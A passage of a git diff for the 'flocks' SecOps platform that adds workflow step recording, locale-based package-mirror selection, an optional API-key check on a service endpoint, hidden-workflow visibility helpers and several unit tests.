diff --git a/flocks/workflow/poller_manager.py b/flocks/workflow/poller_manager.py
index 5238c9f20..923baf500 100644
--- a/flocks/workflow/poller_manager.py
+++ b/flocks/workflow/poller_manager.py
@@ -18,9 +18,9 @@
 from flocks.storage.storage import Storage
 from flocks.utils.log import Log
 from flocks.workflow.execution_store import (
-    compact_history_for_storage,
     compact_outputs_for_storage,
     create_execution_record,
+    ExecutionStepRecorder,
     record_execution_result,
     resolve_execution_outcome,
 )
@@ -415,6 +415,13 @@ async def _execute_run(
         inputs = self._build_inputs(config)
         exec_data = await create_execution_record(workflow_id, input_params=inputs)
         exec_id = str(exec_data["id"])
+        loop = asyncio.get_running_loop()
+        step_recorder = ExecutionStepRecorder(
+            exec_id=exec_id,
+            loop=loop,
+            logger=log,
+            log_event="poller.execution_step.write_failed",
+        )
         current = self._status.get(workflow_id) or self._base_status(workflow_id)
         current["lastRunAt"] = started_at_ms
         current["activeRuns"] = self._cleanup_done_runs(workflow_id)
@@ -428,6 +435,7 @@ async def _execute_run(
                 timeout_s=config["timeoutSeconds"],
                 trace=False,
                 cancel=cancel_event.is_set,
+                on_step_complete=step_recorder.on_step_complete,
             )
             if not isinstance(result, RunWorkflowResult):
                 result = RunWorkflowResult(status="failed", error="invalid_run_result")
@@ -438,16 +446,19 @@ async def _execute_run(
             duration_ms = _now_ms() - started_at_ms
             duration_s = max(0.0, time.time() - started_at_s)
             summary = self._summarize_outputs(result.outputs)
+            step_count = step_recorder.step_count or result.steps
+            exec_data.update(step_recorder.summary)
             exec_data.update({
                 "outputResults": compact_outputs_for_storage(result.outputs),
                 "status": status_value,
                 "finishedAt": _now_ms(),
                 "duration": duration_s,
-                "executionLog": compact_history_for_storage(result.history),
+                "executionLog": [],
                 "errorMessage": error_message,
+                "stepCount": step_count,
                 "currentNodeId": result.last_node_id,
                 "currentPhase": status_value,
-                "currentStepIndex": result.steps,
+                "currentStepIndex": step_count,
                 "triggerId": "schedule-default",
                 "triggerType": "schedule",
                 "deliveryId": inputs.get("_flocks", {}).get("trigger", {}).get("deliveryId"),
@@ -471,12 +482,13 @@ async def _execute_run(
             duration_s = max(0.0, time.time() - started_at_s)
             status_value = "cancelled" if cancel_event.is_set() else "error"
             finished_at_ms = _now_ms()
+            exec_data.update(step_recorder.summary)
             exec_data.update({
                 "status": status_value,
                 "finishedAt": finished_at_ms,
                 "duration": duration_s,
                 "errorMessage": str(exc),
-                "executionLog": compact_history_for_storage(exec_data.get("executionLog")),
+                "executionLog": [],
                 "currentPhase": status_value,
                 "triggerId": "schedule-default",
                 "triggerType": "schedule",
diff --git a/flocks/workflow/requirements.py b/flocks/workflow/requirements.py
index e951fb8c4..a640be68f 100644
--- a/flocks/workflow/requirements.py
+++ b/flocks/workflow/requirements.py
@@ -12,6 +12,8 @@
 from pathlib import Path
 from typing import Any, Dict, Iterable, List, Optional, Sequence
 
+_CN_PYPI_INDEX_URL = "https://mirrors.aliyun.com/pypi/simple"  # mirror returned when a CN region or zh locale is detected
+
 
 def _default_cache_dir() -> Path:
     raw = os.getenv("FLOCKS_WORKFLOW_REQUIREMENTS_CACHE_DIR")
@@ -30,6 +32,40 @@ def _normalize_requirements(reqs: Iterable[str]) -> List[str]:
     return sorted(out)
 
 
+def _is_cn_region(value: Optional[str]) -> bool:
+    """Return True for cn/china/zh/zh-cn, ignoring case, outer whitespace and ``_`` vs ``-``."""
+    return (value or "").strip().lower().replace("_", "-") in ("cn", "china", "zh", "zh-cn")
+
+
+def _is_zh_locale(value: Optional[str]) -> bool:
+    """Return True when the locale string starts with ``zh`` (case-insensitive, trimmed)."""
+    return (value or "").strip().lower().replace("_", "-").startswith("zh")
+
+
+def resolve_python_package_index_url() -> Optional[str]:
+    """Pick the package index URL to use for workflow dependency installs.
+
+    The first non-blank explicit env var wins.  Otherwise the CN mirror is chosen when
+    the region/install-language vars or a locale var indicate Chinese; else ``None``.
+    """
+    explicit_vars = (
+        "FLOCKS_WORKFLOW_SERVICE_PIP_INDEX_URL", "FLOCKS_WORKFLOW_REQUIREMENTS_PIP_INDEX_URL",
+        "PIP_INDEX_URL", "UV_INDEX_URL", "UV_DEFAULT_INDEX", "FLOCKS_UV_DEFAULT_INDEX",
+    )
+    configured = ((os.getenv(name) or "").strip() for name in explicit_vars)
+    explicit = next((url for url in configured if url), None)
+    if explicit is not None:
+        return explicit
+
+    region_vars = ("FLOCKS_UPDATE_REGION", "FLOCKS_INSTALL_LANGUAGE")
+    locale_vars = ("LANGUAGE", "LC_ALL", "LANG")
+    wants_cn_mirror = (
+        any(_is_cn_region(os.getenv(name)) for name in region_vars)
+        or any(_is_zh_locale(os.getenv(name)) for name in locale_vars)
+    )
+    return _CN_PYPI_INDEX_URL if wants_cn_mirror else None
+
+
 def requirements_cache_key(requirements: Sequence[str], *, python_executable: Optional[str] = None) -> str:
     py = (python_executable or sys.executable or "").strip()
     norm = _normalize_requirements(requirements)
@@ -56,6 +92,7 @@ def requirements_from_workflow_metadata(metadata: Optional[Dict[str, Any]]) -> L
 class RequirementsInstaller:
     installer: str = "auto"
     cache_dir: Path = None  # type: ignore[assignment]
+    index_url: Optional[str] = None
 
     def __post_init__(self) -> None:
         object.__setattr__(self, "cache_dir", self.cache_dir or _default_cache_dir())
@@ -79,10 +116,13 @@ def ensure_installed(self, requirements: Sequence[str]) -> bool:
         if marker.exists():
             return False
         which = self._select_installer()
+        index_url = self.index_url or resolve_python_package_index_url()
+        index_args = ["--default-index", index_url] if index_url else []
         if which == "uv":
-            cmd = ["uv", "pip", "install", "--python", sys.executable, *reqs]
+            cmd = ["uv", "pip", "install", "--python", sys.executable, *index_args, *reqs]
         else:
-            cmd = [sys.executable, "-m", "pip", "install", *reqs]
+            pip_index_args = ["--index-url", index_url] if index_url else []
+            cmd = [sys.executable, "-m", "pip", "install", *pip_index_args, *reqs]
         subprocess.run(cmd, check=True)
         marker.write_text("\n".join(reqs) + "\n", encoding="utf-8")
         return True
@@ -96,6 +136,7 @@ class SandboxRequirementsInstaller:
     python_executable: str = "python3"
     marker_root: str = "/workspace/.flocks/workflow/requirements"
     site_packages_dir: str = "/workspace/.flocks/workflow/site-packages"
+    index_url: Optional[str] = None
 
     def _select_installer(self) -> str:
         v = (self.installer or "auto").strip().lower()
@@ -165,7 +206,9 @@ def ensure_installed(self, requirements: Sequence[str], sandbox: Dict[str, Any])
         subprocess.run(mkdir_cmd, check=True)
 
         which = self._select_installer()
+        index_url = self.index_url or resolve_python_package_index_url()
         if which == "uv":
+            index_args = ["--default-index", index_url] if index_url else []
             install_cmd = [
                 *base_cmd,
                 "uv",
@@ -175,9 +218,11 @@ def ensure_installed(self, requirements: Sequence[str], sandbox: Dict[str, Any])
                 py,
                 "--target",
                 self.site_packages_dir,
+                *index_args,
                 *reqs,
             ]
         else:
+            index_args = ["--index-url", index_url] if index_url else []
             install_cmd = [
                 *base_cmd,
                 py,
@@ -188,6 +233,7 @@ def ensure_installed(self, requirements: Sequence[str], sandbox: Dict[str, Any])
                 "--no-cache-dir",
                 "--target",
                 self.site_packages_dir,
+                *index_args,
                 *reqs,
             ]
         subprocess.run(install_cmd, check=True)
diff --git a/flocks/workflow/runner.py b/flocks/workflow/runner.py
index 3d9dcc650..51f27a48d 100644
--- a/flocks/workflow/runner.py
+++ b/flocks/workflow/runner.py
@@ -296,8 +296,9 @@ def run_workflow(
     on_step_start: Optional[Any] = None,
     on_step_complete: Optional[Any] = None,
     max_parallel_workers: int = 4,
-    history_mode: Literal["full", "summary"] = "full",
+    history_mode: Literal["full", "summary"] = "summary",
     cancel: Optional[Callable[[], bool]] = None,
+    retain_history: bool = False,
 ) -> RunWorkflowResult:
     # 确保日志已配置
     _ensure_logging_configured()
@@ -465,6 +466,7 @@ def _on_step_end(_token, step_result):
             cancel=cancel,
             on_step_start=_on_step_start,
             on_step_end=_on_step_end,
+            retain_history=retain_history,
         )
     except FlocksWorkflowError as e:
         # Extract execution context from error if available
@@ -495,8 +497,8 @@ def _on_step_end(_token, step_result):
             history=history_from_error,
         )
 
-    history = [s.model_dump(mode="json") for s in result.history]
-    last_outputs = result.outputs if result.outputs else (result.history[-1].outputs if result.history else {})
+    history = [s.model_dump(mode="json") for s in result.history] if result.history else []
+    last_outputs = result.outputs if result.outputs else {}
 
     if cancel is not None and cancel():
         return RunWorkflowResult(
diff --git a/flocks/workflow/service_runtime.py b/flocks/workflow/service_runtime.py
index 1b89edeed..3590342fb 100644
--- a/flocks/workflow/service_runtime.py
+++ b/flocks/workflow/service_runtime.py
@@ -4,12 +4,14 @@
 
 import argparse
 import asyncio
+import hmac
 import json
+import os
 import time
 from contextlib import asynccontextmanager
 from typing import Any, Dict, Optional
 
-from fastapi import FastAPI, HTTPException
+from fastapi import FastAPI, Header, HTTPException
 from fastapi.responses import JSONResponse
 from pydantic import BaseModel, Field
 
@@ -19,6 +21,7 @@
 from flocks.workflow.tool_context import build_workflow_tool_context
 
 log = Log.create(service="workflow.service_runtime")
+_SERVICE_API_KEY_ENV = "FLOCKS_WORKFLOW_SERVICE_API_KEY"  # env var main() reads for the optional /invoke API key
 
 
 class InvokeRequest(BaseModel):
@@ -36,6 +39,7 @@ def create_service_app(
     workflow_json: Dict[str, Any],
     workflow_id: str,
     release_id: str,
+    api_key: Optional[str] = None,
 ) -> FastAPI:
     """Build service app bound to one workflow snapshot."""
     @asynccontextmanager
@@ -61,6 +65,7 @@ async def lifespan(_app: FastAPI):
     app.state.workflow_json = workflow_json
     app.state.workflow_id = workflow_id
     app.state.release_id = release_id
+    app.state.api_key = api_key
 
     @app.get("/health")
     async def health() -> Dict[str, Any]:
@@ -76,8 +81,17 @@ async def health() -> Dict[str, Any]:
         return JSONResponse(status_code=503, content=payload)
 
     @app.post("/invoke")
-    async def invoke(req: InvokeRequest) -> Dict[str, Any]:
+    async def invoke(
+        req: InvokeRequest,
+        x_api_key: Optional[str] = Header(default=None, alias="x-api-key"),
+    ) -> Dict[str, Any]:
         started = time.time()
+        expected_api_key = app.state.api_key
+        # Compare bytes: hmac.compare_digest raises TypeError for non-ASCII str (would surface as a 500).
+        if expected_api_key and not (x_api_key and hmac.compare_digest(
+            str(x_api_key).encode("utf-8"), str(expected_api_key).encode("utf-8"))):
+            raise HTTPException(status_code=401, detail="Invalid API key")
+
         if not app.state.mcp_ready:
             raise HTTPException(
                 status_code=503,
@@ -150,6 +164,7 @@ def main() -> None:
         workflow_json=workflow_json,
         workflow_id=args.workflow_id,
         release_id=args.release_id,
+        api_key=os.getenv(_SERVICE_API_KEY_ENV),
     )
 
     import uvicorn
diff --git a/flocks/workflow/visibility.py b/flocks/workflow/visibility.py
new file mode 100644
index 000000000..ca037d773
--- /dev/null
+++ b/flocks/workflow/visibility.py
@@ -0,0 +1,71 @@
+"""Visibility helpers for filesystem-backed workflow definitions."""
+
+from __future__ import annotations
+
+from typing import Any, Mapping
+
+_TRUE_STRINGS = {"1", "true", "yes", "on"}
+_HIDDEN_VISIBILITIES = {"hidden", "internal", "private", "template"}
+
+
+def _truthy(value: Any) -> bool:
+    """Return True for the bool True or a string that normalizes into _TRUE_STRINGS."""
+    if isinstance(value, str):
+        return value.strip().lower() in _TRUE_STRINGS
+    # Besides strings only real bools count; e.g. the int 1 is not a flag.
+    return value if isinstance(value, bool) else False
+
+
+def _string_value(value: Any) -> str:  # trimmed, lower-cased text; "" for non-strings
+    return value.strip().lower() if isinstance(value, str) else ""
+
+
+def is_hidden_workflow_meta(meta: Mapping[str, Any] | None) -> bool:
+    """Tell whether a metadata mapping marks its workflow as non-discoverable.
+
+    Hidden means: any flag key is truthy, ``visibility`` is one of
+    _HIDDEN_VISIBILITIES, or ``status`` is "hidden". Non-Mapping input is
+    never hidden.
+    """
+    if not isinstance(meta, Mapping):
+        return False
+
+    # Boolean-style switches: real bools and "true"-like strings both count.
+    for flag in (
+        "hidden", "templateOnly", "internal", "excludeFromUI", "excludeFromPrompt",
+    ):
+        if _truthy(meta.get(flag)):
+            return True
+
+    # Text fields are compared after trimming and lower-casing.
+    if _string_value(meta.get("visibility")) in _HIDDEN_VISIBILITIES:
+        return True
+    return _string_value(meta.get("status")) == "hidden"
+
+
+def is_hidden_workflow(
+    workflow_json: Mapping[str, Any] | None = None,
+    meta: Mapping[str, Any] | None = None,
+) -> bool:
+    """Decide whether a workflow is kept out of UI listings and prompt scans.
+
+    Markers are looked up on ``meta``, then on ``workflow_json`` itself, then
+    on its nested ``metadata``; values that are not Mappings are ignored.
+    """
+    if is_hidden_workflow_meta(meta):
+        return True
+    if not isinstance(workflow_json, Mapping):
+        return False
+    nested = workflow_json.get("metadata")
+    return is_hidden_workflow_meta(workflow_json) or is_hidden_workflow_meta(nested)
+
+
+def is_hidden_workflow_data(data: Mapping[str, Any] | None) -> bool:
+    """Check a read_workflow_dir() result for hidden markers.
+
+    ``data`` itself serves as the metadata mapping and its ``workflowJson``
+    entry as the workflow definition; a non-Mapping ``data`` is not hidden.
+    """
+    if not isinstance(data, Mapping):
+        return False
+    return is_hidden_workflow(data.get("workflowJson"), data)
diff --git a/pyproject.toml b/pyproject.toml
index f54edb8ef..821861848 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,6 +1,6 @@
 [project]
 name = "flocks"
-version = "v2026.6.10"
+version = "v2026.6.17"
 description = "AI-Native SecOps platform with multi-agent collaboration"
 authors = [
     {name = "Flocks Team", email = "team@example.com"}
@@ -33,9 +33,9 @@ dependencies = [
     # CLI & Terminal UI
     "click>=8.1.7",
     "rich>=13.7.0",
-    "typer>=0.9.0",
+    "typer>=0.9.0,<0.24.0",
     # AI & LLM
-    "litellm>=1.30.0",
+    "litellm==1.83.7",
     "anthropic>=0.86.0",
     "openai>=1.12.0",
     "google-genai>=0.3.0",
diff --git a/tests/acp/test_agent_command_arguments.py b/tests/acp/test_agent_command_arguments.py
new file mode 100644
index 000000000..f01d81023
--- /dev/null
+++ b/tests/acp/test_agent_command_arguments.py
@@ -0,0 +1,148 @@
+from __future__ import annotations
+
+from types import SimpleNamespace
+from unittest.mock import AsyncMock, patch
+
+import pytest
+
+from flocks.acp.agent import ACPAgent
+from flocks.acp.types import ACPConfig
+
+
+class _DummySessionManager:  # single-session stand-in assigned to agent._session_manager
+    def __init__(self, state):
+        self._state = state  # the only session this stub knows about
+
+    def get(self, session_id: str):
+        assert session_id == self._state.id  # fail loudly on an unexpected session id
+        return self._state
+
+    def set_model(self, session_id: str, model):
+        assert session_id == self._state.id
+        self._state.model = model  # record the model on the shared state object
+
+
+@pytest.mark.asyncio
+async def test_prompt_command_parses_json_arguments_for_acp():
+    """A JSON-object argument string reaches ``sdk.session.command`` both raw
+    (``arguments``) and decoded (``arguments_json``).
+
+    The session carries no model, so the mocked default model is expected.
+    """
+    state = SimpleNamespace(
+        id="ses_acp_json",
+        cwd="/tmp/project",
+        model=None,
+        mode_id="rex",
+    )
+    session_api = SimpleNamespace(prompt=AsyncMock(), command=AsyncMock())
+    sdk = SimpleNamespace(session=session_api)
+
+    agent = ACPAgent(SimpleNamespace(), ACPConfig(sdk=sdk))
+    agent._session_manager = _DummySessionManager(state)
+    # With no session model, the command is expected to use this default.
+    default_model = {"providerID": "anthropic", "modelID": "claude-test"}
+    agent._get_default_model = AsyncMock(return_value=default_model)
+
+    request = {
+        "sessionId": "ses_acp_json",
+        "prompt": [{"type": "text", "text": '/bug {"scope":"acp","retry":1}'}],
+    }
+    default_agent = AsyncMock(return_value="rex")
+    with patch("flocks.agent.registry.Agent.default_agent", new=default_agent):
+        result = await agent.prompt(request)
+
+    assert result == {"stopReason": "end_turn", "_meta": {}}
+    # Slash commands are expected to bypass the plain prompt call.
+    session_api.prompt.assert_not_called()
+    session_api.command.assert_awaited_once_with(
+        session_id="ses_acp_json",
+        command="bug",
+        arguments='{"scope":"acp","retry":1}',
+        arguments_json={"scope": "acp", "retry": 1},
+        model="anthropic/claude-test",
+        agent="rex",
+        directory="/tmp/project",
+    )
+
+
+@pytest.mark.asyncio
+async def test_prompt_command_keeps_legacy_string_arguments_when_not_json():
+    """Free-text arguments are forwarded verbatim with ``arguments_json=None``.
+
+    The session already has a model, which is expected as "provider/model".
+    """
+    model = {"providerID": "anthropic", "modelID": "claude-test"}
+    state = SimpleNamespace(
+        id="ses_acp_string",
+        cwd="/tmp/project",
+        model=model,
+        mode_id="rex",
+    )
+    session_api = SimpleNamespace(prompt=AsyncMock(), command=AsyncMock())
+    sdk = SimpleNamespace(session=session_api)
+    agent = ACPAgent(SimpleNamespace(), ACPConfig(sdk=sdk))
+    agent._session_manager = _DummySessionManager(state)
+
+    request = {
+        "sessionId": "ses_acp_string",
+        "prompt": [{"type": "text", "text": "/bug investigate routing"}],
+    }
+    default_agent = AsyncMock(return_value="rex")
+    with patch("flocks.agent.registry.Agent.default_agent", new=default_agent):
+        result = await agent.prompt(request)
+
+    assert result == {"stopReason": "end_turn", "_meta": {}}
+    # Slash commands are expected to bypass the plain prompt call.
+    session_api.prompt.assert_not_called()
+    # The text after the command name is not JSON, so no decoded form exists.
+    session_api.command.assert_awaited_once_with(
+        session_id="ses_acp_string",
+        command="bug",
+        arguments="investigate routing",
+        arguments_json=None,
+        model="anthropic/claude-test",
+        agent="rex",
+        directory="/tmp/project",
+    )
+
+
+@pytest.mark.asyncio
+async def test_prompt_command_falls_back_when_json_parse_fails():
+    """Malformed JSON falls back to the legacy string path.
+
+    The truncated payload is forwarded as-is with ``arguments_json=None``.
+    """
+    model = {"providerID": "anthropic", "modelID": "claude-test"}
+    state = SimpleNamespace(
+        id="ses_acp_invalid_json",
+        cwd="/tmp/project",
+        model=model,
+        mode_id="rex",
+    )
+    session_api = SimpleNamespace(prompt=AsyncMock(), command=AsyncMock())
+    sdk = SimpleNamespace(session=session_api)
+    agent = ACPAgent(SimpleNamespace(), ACPConfig(sdk=sdk))
+    agent._session_manager = _DummySessionManager(state)
+
+    request = {
+        "sessionId": "ses_acp_invalid_json",
+        "prompt": [{"type": "text", "text": '/bug {"scope":'}],
+    }
+    default_agent = AsyncMock(return_value="rex")
+    with patch("flocks.agent.registry.Agent.default_agent", new=default_agent):
+        result = await agent.prompt(request)
+
+    assert result == {"stopReason": "end_turn", "_meta": {}}
+    # Slash commands are expected to bypass the plain prompt call.
+    session_api.prompt.assert_not_called()
+    # The payload does not parse, so no decoded form is expected.
+    session_api.command.assert_awaited_once_with(
+        session_id="ses_acp_invalid_json",
+        command="bug",
+        arguments='{"scope":',
+        arguments_json=None,
+        model="anthropic/claude-test",
+        agent="rex",
+        directory="/tmp/project",
+    )
diff --git a/tests/agent/test_unified_session_loop.py b/tests/agent/test_unified_session_loop.py
index 852330586..255882ccd 100644
--- a/tests/agent/test_unified_session_loop.py
+++ b/tests/agent/test_unified_session_loop.py
@@ -280,3 +280,62 @@ async def test_process_session_message_pins_explicit_request_model(self, monkeyp
             model="claude-sonnet-4-5",
             model_pinned=True,
         )
+
+    @pytest.mark.asyncio
+    async def test_display_text_does_not_replace_model_prompt(self, monkeypatch):
+        """displayText is presentation metadata; the stored text remains the real prompt."""
+        from types import SimpleNamespace
+        from flocks.server.routes import session as session_routes
+
+        request = session_routes.PromptRequest(
+            parts=[{"type": "text", "text": "Read guide.md and configure the workflow."}],
+            displayText="@@flocks-instruction:智能配置",  # deliberately differs from the part text
+            noReply=True,
+        )
+        session = SimpleNamespace(  # minimal stand-in passed as the session argument
+            id="ses_test",
+            project_id="proj",
+            directory="/tmp/project",
+            agent="rex",
+            provider=None,
+            model=None,
+            model_pinned=False,
+        )
+
+        monkeypatch.setattr(
+            "flocks.agent.registry.Agent.default_agent",
+            AsyncMock(return_value="rex"),
+        )
+        monkeypatch.setattr(
+            "flocks.agent.registry.Agent.get",
+            AsyncMock(return_value=SimpleNamespace(name="rex", model=None)),
+        )
+        monkeypatch.setattr("flocks.session.session.Session.update", AsyncMock())
+        monkeypatch.setattr("flocks.provider.provider.Provider._ensure_initialized", lambda: None)
+        monkeypatch.setattr("flocks.provider.provider.Provider.apply_config", AsyncMock())
+        monkeypatch.setattr("flocks.provider.provider.Provider.get", lambda _provider_id: object())
+        monkeypatch.setattr("flocks.config.config.Config.get", AsyncMock(return_value=SimpleNamespace()))
+        monkeypatch.setattr("flocks.tool.registry.ToolRegistry.init", lambda: None)
+        monkeypatch.setattr(
+            "flocks.session.lifecycle.revert.SessionRevert.cleanup",
+            AsyncMock(),
+        )
+        message_create = AsyncMock(return_value=SimpleNamespace(id="msg_user_1"))  # captures Message.create kwargs
+        publish_event = AsyncMock()  # captures every published event
+        monkeypatch.setattr("flocks.session.message.Message.create", message_create)
+        monkeypatch.setattr("flocks.server.routes.event.publish_event", publish_event)
+
+        await session_routes._process_session_message(
+            "ses_test",
+            session,
+            request,
+            "/tmp/project",
+        )
+
+        create_kwargs = message_create.await_args.kwargs  # keyword arguments of the last Message.create await
+        assert create_kwargs["content"] == "Read guide.md and configure the workflow."
+        assert create_kwargs["part_metadata"] == {"displayText": "@@flocks-instruction:智能配置"}
+
+        part_event = publish_event.await_args_list[1].args[1]["part"]  # NOTE(review): assumes the 2nd event is the part update — confirm
+        assert part_event["text"] == "Read guide.md and configure the workflow."
+        assert part_event["metadata"] == {"displayText": "@@flocks-instruction:智能配置"}
diff --git a/tests/channel/test_channel.py b/tests/channel/test_channel.py
index 098606aab..065325060 100644
--- a/tests/channel/test_channel.py
+++ b/tests/channel/test_channel.py
@@ -839,6 +839,55 @@ async def test_append_user_message_stores_feishu_media_part(self, monkeypatch):
         assert stored_part.mime == "image/png"
         assert stored_part.url == "file:///tmp/diagram.png"
 
+    @pytest.mark.asyncio
+    async def test_append_user_message_accepts_windows_file_uri(self, monkeypatch):  # file:///C:/... URIs must resolve to a drive path
+        from flocks.channel.inbound.dispatcher import InboundDispatcher
+        from flocks.config.config import ChannelConfig
+
+        created_message = SimpleNamespace(id="message_user_1")
+        store_part = AsyncMock()
+        paths_checked: list[str] = []  # every path handed to the patched os.path.isfile
+
+        def fake_isfile(path: str) -> bool:
+            paths_checked.append(path)
+            return path == "C:/Users/demo/Pictures/channel image.png"  # only the decoded path without a leading slash exists
+
+        monkeypatch.setattr(
+            "flocks.session.message.Message.create",
+            AsyncMock(return_value=created_message),
+        )
+        monkeypatch.setattr(
+            "flocks.session.message.Message.store_part",
+            store_part,
+        )
+        monkeypatch.setattr(
+            "flocks.session.message.Message.parts",
+            AsyncMock(return_value=[]),
+        )
+        monkeypatch.setattr("os.path.isfile", fake_isfile)
+
+        await InboundDispatcher._append_user_message(
+            "session_1",
+            "[图片消息]",
+            InboundMessage(
+                channel_id="weixin",
+                account_id="default",
+                message_id="msg_1",
+                sender_id="user_1",
+                chat_type=ChatType.DIRECT,
+                media_url="file:///C:/Users/demo/Pictures/channel%20image.png",  # percent-encoded Windows file URI
+                media_mime="image/png",
+            ),
+            ChannelConfig(enabled=True),
+        )
+
+        assert paths_checked == ["C:/Users/demo/Pictures/channel image.png"]  # exactly one lookup, already URL-decoded
+        store_part.assert_awaited_once()
+        stored_part = store_part.await_args.args[2]  # third positional argument of store_part is the part
+        assert stored_part.type == "file"
+        assert stored_part.filename == "channel image.png"
+        assert stored_part.mime == "image/png"
+
 
 class TestMultimodalInput:
     @pytest.mark.asyncio
diff --git a/tests/channel/test_dingtalk.py b/tests/channel/test_dingtalk.py
index a258df189..60c9d64a8 100644
--- a/tests/channel/test_dingtalk.py
+++ b/tests/channel/test_dingtalk.py
@@ -13,6 +13,8 @@
 import contextlib
 import importlib.util
 import json
+import threading
+import time
 from pathlib import Path
 from types import SimpleNamespace
 from unittest.mock import AsyncMock, patch
@@ -369,6 +371,16 @@ def test_validate_config_rejects_missing_credentials(self):
         assert error is not None
         assert "appKey" in error or "credentials" in error.lower()
 
+    def test_validate_config_rejects_dingtalk_prefixed_client_id(self):
+        """A clientId carrying a ``dingtalk_`` prefix yields an error mentioning it."""
+        from flocks.channel.builtin.dingtalk import DingTalkChannel
+
+        config = {"clientId": "dingtalk_dingecjrxh34nr6aqbit", "clientSecret": "s"}
+        error = DingTalkChannel().validate_config(config)
+
+        assert error is not None
+        assert "dingtalk_" in error
+
     def test_meta_aliases(self):
         from flocks.channel.builtin.dingtalk import DingTalkChannel
         meta = DingTalkChannel().meta()
@@ -1016,25 +1028,31 @@ async def _ok_preflight(**_kw):
 
         runner = self._make_runner()
 
-        # Fake stream client whose ``start()`` returns immediately every
-        # time — the exact pathology we want to detect.
-        class _ImmediateStartClient:
+        # Fake stream client; the runner's own session method is patched below
+        # to return immediately every time, which is the pathology we want to
+        # detect.
+        class _ImmediateClient:
             def __init__(self, *_a, **_kw):
-                self.start_calls = 0
                 self.websocket = None
 
             def register_callback_handler(self, *_a, **_kw):
                 pass
 
-            async def start(self):
-                self.start_calls += 1
-
             def close(self):
                 pass
 
         monkeypatch.setattr(
             stream_mod.dingtalk_stream, "DingTalkStreamClient",
-            _ImmediateStartClient,
+            _ImmediateClient,
+        )
+
+        async def _immediate_session(_runner):
+            return None
+
+        monkeypatch.setattr(
+            stream_mod.DingTalkStreamRunner,
+            "_start_stream_client_session",
+            _immediate_session,
         )
 
         with pytest.raises(stream_mod.DingTalkStreamStallError) as exc_info:
@@ -1078,19 +1096,6 @@ def __init__(self, *_a, **_kw):
             def register_callback_handler(self, *_a, **_kw):
                 pass
 
-            async def start(self):
-                call_count["n"] += 1
-                if call_count["n"] == 1:
-                    # Simulate a healthy run: deliver one message,
-                    # then return cleanly.  The runner counts
-                    # ``_messages_received`` directly, so we bump it
-                    # before returning to mimic an inbound frame.
-                    runner._messages_received += 1
-                    return
-                # On the 2nd call, stop the runner so the loop exits
-                # without further iterations.
-                runner._running = False
-
             def close(self):
                 pass
 
@@ -1099,10 +1104,69 @@ def close(self):
             _MixedClient,
         )
 
+        async def _mixed_session(_runner):
+            call_count["n"] += 1
+            if call_count["n"] == 1:
+                # Simulate a healthy run: deliver one message, then return
+                # cleanly.  The runner counts ``_messages_received`` directly,
+                # so we bump it before returning to mimic an inbound frame.
+                runner._messages_received += 1
+                return
+            # On the 2nd call, stop the runner so the loop exits without
+            # further iterations.
+            runner._running = False
+
+        monkeypatch.setattr(
+            stream_mod.DingTalkStreamRunner,
+            "_start_stream_client_session",
+            _mixed_session,
+        )
+
         await asyncio.wait_for(runner.run(), timeout=2.0)
         # Counter MUST have reset after the run that delivered a message.
         assert runner._consecutive_short_runs == 0
 
+    @pytest.mark.asyncio
+    async def test_blocking_open_connection_does_not_block_event_loop(self):
+        """Regression for the production freeze: SDK open_connection is sync.
+
+        The runner must push that call into a worker thread so a slow gateway
+        request cannot block FastAPI's main event loop.
+        """
+        runner = self._make_runner()
+        entered = threading.Event()  # set as soon as open_connection starts running
+
+        class _BlockingClient:
+            websocket = None
+
+            def pre_start(self):
+                pass
+
+            def open_connection(self):
+                entered.set()
+                time.sleep(0.2)  # blocking sleep standing in for a slow synchronous call
+                return None
+
+        runner._stream_client = _BlockingClient()
+        runner._running = True
+
+        started_at = time.monotonic()
+        task = asyncio.create_task(runner._start_stream_client_session())
+        try:
+            while not entered.is_set():  # yield to the loop until open_connection has been entered
+                await asyncio.sleep(0)
+
+            await asyncio.sleep(0.02)
+            assert time.monotonic() - started_at < 0.1  # loop kept running during the 0.2 s blocking sleep
+            assert not task.done()  # the session is still waiting on the blocking call
+
+            with pytest.raises(RuntimeError):  # NOTE(review): presumably raised because open_connection returned None — confirm
+                await asyncio.wait_for(task, timeout=1.0)
+        finally:
+            if not task.done():  # never let a pending task outlive the test
+                task.cancel()
+                await asyncio.gather(task, return_exceptions=True)
+
     @pytest.mark.asyncio
     async def test_dispatch_queue_drops_overflow_without_blocking(
         self, monkeypatch,
@@ -1208,6 +1272,35 @@ async def test_enqueue_before_pool_started_does_not_crash(self):
         assert runner._messages_received == 1
         assert runner._dropped_messages == 0  # no QueueFull, just no queue
 
+    @pytest.mark.asyncio
+    async def test_enqueue_from_thread_hops_to_owner_loop(self):
+        """SDK callbacks from a non-owner thread must not touch asyncio.Queue."""
+        runner = self._make_runner(account_overrides={
+            "dispatchWorkers": 1,
+            "dispatchQueueSize": 2,
+        })
+        runner._loop = asyncio.get_running_loop()  # the test's own loop plays the owner loop
+        runner._dispatch_queue = asyncio.Queue(
+            maxsize=runner._dispatch_queue_size,
+        )
+        message = SimpleNamespace(text="from-thread")
+
+        thread = threading.Thread(  # call the enqueue entry point from a foreign thread
+            target=runner._enqueue_dispatch,
+            args=(message,),
+        )
+        thread.start()
+        thread.join(timeout=1.0)
+        assert not thread.is_alive()  # the call returned within the join timeout
+
+        for _ in range(20):  # poll up to ~0.2 s for the hand-off to be processed on this loop
+            if runner._messages_received == 1:
+                break
+            await asyncio.sleep(0.01)
+
+        assert runner._messages_received == 1
+        assert runner._dispatch_queue.get_nowait() is message  # the very same object ended up queued
+
     def test_permanent_error_hierarchy(self):
         """``DingTalkStreamStallError`` MUST inherit from
         ``DingTalkPermanentError`` so :meth:`DingTalkChannel._classify_and_raise`
diff --git a/tests/command/test_handler_json_args.py b/tests/command/test_handler_json_args.py
new file mode 100644
index 000000000..d9a901db0
--- /dev/null
+++ b/tests/command/test_handler_json_args.py
@@ -0,0 +1,45 @@
+from __future__ import annotations
+
+from unittest.mock import AsyncMock, patch
+
+import pytest
+
+from flocks.command.handler import handle_slash_command
+from flocks.input.events import ParsedCommand
+
+
+@pytest.mark.asyncio
+async def test_handle_slash_command_forwards_structured_arguments():
+    """``args_json`` of the parsed command is passed to run_direct_command with ``args``."""
+    send_text = AsyncMock()
+    send_prompt = AsyncMock()
+    parsed = ParsedCommand(
+        raw_text='/agents {"team":"blue"}',
+        command_name="agents",
+        canonical_name="agents",
+        args='{"team":"blue"}',
+        args_json={"team": "blue"},
+    )
+
